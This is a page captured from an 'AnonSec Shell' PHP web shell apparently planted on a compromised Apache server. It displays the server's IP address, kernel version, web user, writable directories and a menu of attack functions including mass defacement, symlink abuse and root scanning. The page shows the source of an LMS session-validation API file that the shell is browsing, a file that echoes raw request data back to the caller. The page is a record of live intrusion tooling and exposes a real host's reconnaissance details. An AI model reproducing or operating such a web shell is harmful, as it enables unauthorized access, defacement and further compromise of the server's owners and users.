AnonSec Shell
Server IP : 165.22.154.248  /  Your IP : 216.73.217.111   [ Reverse IP ]
Web Server : Apache/2.4.29 (Ubuntu)
System : Linux droplet-integra 4.15.0-197-generic #208-Ubuntu SMP Tue Nov 1 17:23:37 UTC 2022 x86_64
User : www-data ( 33)
PHP Version : 7.2.24-0ubuntu0.18.04.15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 1 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/9427/cwd/avanza-lms.old.bak9874115/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/9427/cwd/avanza-lms.old.bak9874115/api/validate-user-session.php
<?php
//@sucerman 5 de abril de 2018
ini_set('display_errors', 1);
error_reporting(E_ALL);
echo dirname(__FILE__);
require_once(dirname(__FILE__) . '/../config.php');

session_start();
//Variables globales
global $CFG, $USER, $DB;
//Respuesta del servicio API
//Codigos de respuesta
// -1 => usuario no autenticado
// -2 => Parametros incompletos
// -3 => Error Interno
// -4 => Metodo HTTP incorrecto
// -5 => usuario diferente 
//  0 => Usuario logeado
//Objeto de respuesta del API
$arrayRespuesta=array(
	'estado'=>'-1',
	'mensaje'=>'Usuario no autenticado',
	'data'=>$_REQUEST
);
try{
	//Lógica de Negocio
	if(isloggedin()){ //si esta logeado
		if($_SERVER['REQUEST_METHOD'] === 'POST'){
			if(isset($_REQUEST['id_usuario'])){
				if($_REQUEST['id_usuario']==$USER->id){
					$arrayRespuesta=array(
	    				'estado'=>'0',
	    				'mensaje'=>'Usuario autenticado y autorizado',
	    				'data'=>$_REQUEST
		            );
				}else{
					$arrayRespuesta=array(
	    				'estado'=>'-5',
	    				'mensaje'=>'Usuario diferente al autenticado',
	    				'data'=>$_REQUEST
		            );
				}
			}else{
				$arrayRespuesta=array(
	                'estado'=>'-2',
	                'mensaje'=>'Parametros incompletos',
	                'data'=>$_REQUEST
		        );
			}
		}else{
			$arrayRespuesta=array(
	            'estado'=>'-4',
	            'mensaje'=>'Verbo HTTP incorrecto',
	            'data'=>$_REQUEST
	        );
		}
	}else{
		$arrayRespuesta=array(
			'estado'=>'-1',
			'mensaje'=>'Usuario no autenticado',
			'data'=>$_REQUEST
		);
	}
}catch(Exception $e){
	$arrayRespuesta=array(
        'estado'=>'-3',
        'mensaje'=>$e->getMessage(),
        'data'=>$_REQUEST
    );
}
//imprime el resultado
header('Content-Type: application/json');
echo json_encode($arrayRespuesta);

Anon7 - 2022
AnonSec Team